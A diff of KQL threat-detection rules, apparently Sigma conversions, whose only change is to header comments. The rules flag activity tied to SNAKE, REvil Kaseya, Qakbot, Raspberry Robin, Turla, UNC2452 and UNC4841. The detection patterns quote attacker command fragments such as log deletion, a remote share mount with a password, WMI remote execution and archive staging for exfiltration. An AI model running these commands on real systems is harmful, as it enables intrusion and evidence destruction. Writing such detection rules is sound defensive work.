\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql
index beb21616..7e3d7d4b 100644
--- a/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_snake_malware_persistence_service_execution.kql
@@ -1,10 +1,10 @@
-// Title: Potential SNAKE Malware Persistence Service Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-04
-// Level: high
-// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential SNAKE Malware Persistence Service Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
 | where FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\services.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql
index f7c78887..49bbc955 100644
--- a/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/potential_snatch_ransomware_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Snatch Ransomware Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-08-26
-// Level: high
-// Description: Detects specific process characteristics of Snatch ransomware word document droppers
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204, detection.emerging-threats
-// False Positives:
-// - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely
-
-DeviceProcessEvents
+// Title: Potential Snatch Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-08-26
+// Level: high
+// Description: Detects specific process characteristics of Snatch ransomware word document droppers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, detection.emerging-threats
+// False Positives:
+// - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "shutdown\\s+/r /f /t 00" or ProcessCommandLine matches regex "net\\s+stop SuperBackupMan"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql
index b4dc7b88..3bbdf80f 100644
--- a/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql
+++ b/KQL/rules-emerging-threats/Execution/printernightmare_mimikatz_driver_name.kql
@@ -1,12 +1,12 @@
-// Title: PrinterNightmare Mimikatz Driver Name
-// Author: Markus Neis, @markus_neis, Florian Roth
-// Date: 2021-07-04
-// Level: critical
-// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats
-// False Positives:
-// - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
-
-DeviceRegistryEvents
+// Title: PrinterNightmare Mimikatz Driver Name
+// Author: Markus Neis, @markus_neis, Florian Roth
+// Date: 2021-07-04
+// Level: critical
+// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats
+// False Positives:
+// - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810*" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql
index db5ce9c1..f05ad122 100644
--- a/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/qakbot_uninstaller_execution.kql
@@ -1,12 +1,12 @@
-// Title: Qakbot Uninstaller Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023-08-31
-// Level: high
-// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Qakbot Uninstaller Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\QbotUninstall.exe" or (SHA256 startswith "423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180" or SHA256 startswith "559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6" or SHA256 startswith "855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071" or SHA256 startswith "FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql
index 5d31244e..28c17306 100644
--- a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql
+++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql
@@ -1,12 +1,12 @@
-// Title: Raspberry Robin Initial Execution From External Drive
-// Author: @kostastsale
-// Date: 2022-05-06
-// Level: high
-// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Raspberry Robin Initial Execution From External Drive
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:") and ((ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q") and FolderPath endswith "\\msiexec.exe") and (InitiatingProcessCommandLine contains "/r" and (InitiatingProcessCommandLine endswith ".bin" or InitiatingProcessCommandLine endswith ".ico" or InitiatingProcessCommandLine endswith ".lnk" or InitiatingProcessCommandLine endswith ".lo" or InitiatingProcessCommandLine endswith ".sv" or InitiatingProcessCommandLine endswith ".usb") and InitiatingProcessFolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql
index 0e2abbb2..9379fc4c 100644
--- a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql
+++ b/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql
@@ -1,12 +1,12 @@
-// Title: Raspberry Robin Subsequent Execution of Commands
-// Author: @kostastsale
-// Date: 2022-05-06
-// Level: high
-// Description: Detects raspberry robin subsequent execution of commands.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Raspberry Robin Subsequent Execution of Commands
+// Author: @kostastsale
+// Date: 2022-05-06
+// Level: high
+// Description: Detects raspberry robin subsequent execution of commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "installdriver" or ProcessCommandLine contains "setfiledsndir" or ProcessCommandLine contains "vkipdse") and (ProcessCommandLine contains "odbcconf.exe" and ProcessCommandLine contains "regsvr" and ProcessCommandLine contains "shellexec_rundll") and (ProcessCommandLine endswith "-a" or ProcessCommandLine endswith "/a" or ProcessCommandLine endswith "–a" or ProcessCommandLine endswith "—a" or ProcessCommandLine endswith "―a" or ProcessCommandLine endswith "-f" or ProcessCommandLine endswith "/f" or ProcessCommandLine endswith "–f" or ProcessCommandLine endswith "—f" or ProcessCommandLine endswith "―f" or ProcessCommandLine endswith "-s" or ProcessCommandLine endswith "/s" or ProcessCommandLine endswith "–s" or ProcessCommandLine endswith "—s" or ProcessCommandLine endswith "―s") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe") and InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql
index 5dd3d844..869f074e 100644
--- a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql
+++ b/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql
@@ -1,10 +1,10 @@
-// Title: REvil Kaseya Incident Malware Patterns
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-03
-// Level: critical
-// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: REvil Kaseya Incident Malware Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-03
+// Level: critical
+// Description: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.g0115, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "C:\\Windows\\cert.exe" or ProcessCommandLine contains "del /q /f c:\\kworking\\agent.crt" or ProcessCommandLine contains "Kaseya VSA Agent Hot-fix" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\MsMpEng.exe" or ProcessCommandLine contains "rmdir /s /q %SystemDrive%\\inetpub\\logs" or (ProcessCommandLine contains "del /s /q /f %SystemDrive%\\" and ProcessCommandLine contains ".log") or ProcessCommandLine contains "c:\\kworking1\\agent.exe" or ProcessCommandLine contains "c:\\kworking1\\agent.crt") or (FolderPath in~ ("C:\\Windows\\MsMpEng.exe", "C:\\Windows\\cert.exe", "C:\\kworking\\agent.exe", "C:\\kworking1\\agent.exe")) or (ProcessCommandLine contains "del /s /q /f" and ProcessCommandLine contains "WebPages\\Errors\\webErrorLog.txt")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql
index d81d716c..667ac9f1 100644
--- a/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/rorschach_ransomware_execution_activity.kql
@@ -1,12 +1,12 @@
-// Title: Rorschach Ransomware Execution Activity
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-04-04
-// Level: critical
-// Description: Detects Rorschach ransomware execution activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Rorschach Ransomware Execution Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-04
+// Level: critical
+// Description: Detects Rorschach ransomware execution activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "11111111" and (FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\vssadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql
index 88ef0160..5ef1bece 100644
--- a/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/snake_malware_installer_name_indicators.kql
@@ -1,12 +1,12 @@
-// Title: SNAKE Malware Installer Name Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-10
-// Level: low
-// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis.
-
-DeviceFileEvents
+// Title: SNAKE Malware Installer Name Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: low
+// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis.
+
+DeviceFileEvents
 | where FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql
index 69a9adc5..64b7109e 100644
--- a/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql
+++ b/KQL/rules-emerging-threats/Execution/snake_malware_kernel_driver_file_indicator.kql
@@ -1,12 +1,12 @@
-// Title: SNAKE Malware Kernel Driver File Indicator
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-10
-// Level: critical
-// Description: Detects SNAKE malware kernel driver file indicator
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: SNAKE Malware Kernel Driver File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: critical
+// Description: Detects SNAKE malware kernel driver file indicator
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath =~ "C:\\Windows\\System32\\Com\\Comadmin.dat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql
index fdd0e8b5..cc0b6221 100644
--- a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql
+++ b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql
@@ -1,10 +1,10 @@
-// Title: SNAKE Malware WerFault Persistence File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-10
-// Level: high
-// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-
-DeviceFileEvents
+// Title: SNAKE Malware WerFault Persistence File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: high
+// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceFileEvents
 | where (FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql
index 405d7123..d72fcae8 100644
--- a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql
@@ -1,10 +1,10 @@
-// Title: Trickbot Malware Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-11-26
-// Level: high
-// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1559, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Trickbot Malware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-11-26
+// Level: high
+// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1559, detection.emerging-threats
+
+DeviceProcessEvents
 | where FolderPath endswith "\\wermgr.exe" and InitiatingProcessCommandLine contains "DllRegisterServer" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql
index e618219e..a2602890 100644
--- a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql
+++ b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql
@@ -1,10 +1,10 @@
-// Title: TropicTrooper Campaign November 2018
-// Author: @41thexplorer, Microsoft Defender ATP
-// Date: 2019-11-12
-// Level: high
-// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: TropicTrooper Campaign November 2018
+// Author: @41thexplorer, Microsoft Defender ATP
+// Date: 2019-11-12
+// Level: high
+// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql
index 068b39ef..d12fb095 100644
--- a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql
+++ b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql
@@ -1,10 +1,10 @@
-// Title: Turla Group Lateral Movement
-// Author: Markus Neis
-// Date: 2017-11-07
-// Level: critical
-// Description: Detects automated lateral movement by Turla group
-// MITRE Tactic: Execution
-// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Turla Group Lateral Movement
+// Author: Markus Neis
+// Date: 2017-11-07
+// Level: critical
+// Description: Detects automated lateral movement by Turla group
+// MITRE Tactic: Execution
+// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine startswith "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" " or (ProcessCommandLine contains "dir c:\\" and ProcessCommandLine contains ".doc" and ProcessCommandLine contains " /s") or (ProcessCommandLine contains "dir %TEMP%\\" and ProcessCommandLine contains ".exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql
index f52fc752..d5447f08 100644
--- a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql
+++ b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql
@@ -1,12 +1,12 @@
-// Title: UNC2452 PowerShell Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-01-20
-// Level: critical
-// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: UNC2452 PowerShell Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-20
+// Level: critical
+// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Invoke-WMIMethod win32_process -name create -argumentlist" and ProcessCommandLine contains "rundll32 c:\\windows") or (ProcessCommandLine contains "wmic /node:" and ProcessCommandLine contains "process call create \"rundll32 c:\\windows")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql
index 6d08322a..64384954 100644
--- a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql
+++ b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql
@@ -1,10 +1,10 @@
-// Title: UNC2452 Process Creation Patterns
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-01-22
-// Level: high
-// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: UNC2452 Process Creation Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-22
+// Level: high
+// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".txt")) or ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".log")) or ((ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "C:\\Windows" and ProcessCommandLine contains ".dll,Tk_") and (InitiatingProcessCommandLine contains "wscript.exe" and InitiatingProcessCommandLine contains ".vbs")) or (ProcessCommandLine contains "cmd.exe /C " and (InitiatingProcessCommandLine contains "C:\\Windows" and InitiatingProcessCommandLine contains ".dll") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessCommandLine =~ "" and FolderPath endswith "\\dllhost.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql
index 84f03c5d..1d8ce1ba 100644
--- a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql
@@ -1,12 +1,12 @@
-// Title: UNC4841 - Barracuda ESG Exploitation Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: high
-// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: UNC4841 - Barracuda ESG Exploitation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "/11111.tar" or FolderPath endswith "/aacore.sh" or FolderPath endswith "/appcheck.sh" or FolderPath endswith "/autoins" or FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/etc/cron.daily/core_check.sh" or FolderPath endswith "/etc/cron.daily/core.sh" or FolderPath endswith "/etc/cron.hourly/aacore.sh" or FolderPath endswith "/etc/cron.hourly/appcheck.sh" or FolderPath endswith "/etc/cron.hourly/core.sh" or FolderPath endswith "/get_fs_info.pl" or FolderPath endswith "/imgdata.jpg" or FolderPath endswith "/install_att_v2.tar" or FolderPath endswith "/install_bvp74_auth.tar" or FolderPath endswith "/install_helo.tar" or FolderPath endswith "/install_reuse.tar" or FolderPath endswith "/intent_helo" or FolderPath endswith "/intent_reuse" or FolderPath endswith "/intentbas" or FolderPath endswith "/mod_attachment.lua" or FolderPath endswith "/mod_content.lua" or FolderPath endswith "/mod_require_helo.lua" or FolderPath endswith "/mod_rtf" or FolderPath endswith "/mod_sender.lua" or FolderPath endswith "/mod_udp.so" or 
FolderPath endswith "/nfsd_stub.ko" or FolderPath endswith "/resize_reisertab" or FolderPath endswith "/resize_risertab" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/rverify" or FolderPath endswith "/saslautchd" or FolderPath endswith "/sendscd" or FolderPath endswith "/snapshot.tar" or FolderPath endswith "/tmp/p" or FolderPath endswith "/tmp/p7" or FolderPath endswith "/tmp/t" or FolderPath endswith "/update_v2.sh" or FolderPath endswith "/update_v31.sh" or FolderPath endswith "/update_v35.sh" or FolderPath endswith "/update_version"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql
index 79424796..6ddf36c6 100644
--- a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql
+++ b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql
@@ -1,10 +1,10 @@
-// Title: UNC4841 - Email Exfiltration File Pattern
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: high
-// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
-
-DeviceFileEvents
+// Title: UNC4841 - Email Exfiltration File Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: high
+// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath matches regex "/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql
index fc00805c..cc460d78 100644
--- a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql
+++ b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql
@@ -1,12 +1,12 @@
-// Title: UNC4841 - Potential SEASPY Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: critical
-// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: UNC4841 - Potential SEASPY Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: critical
+// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
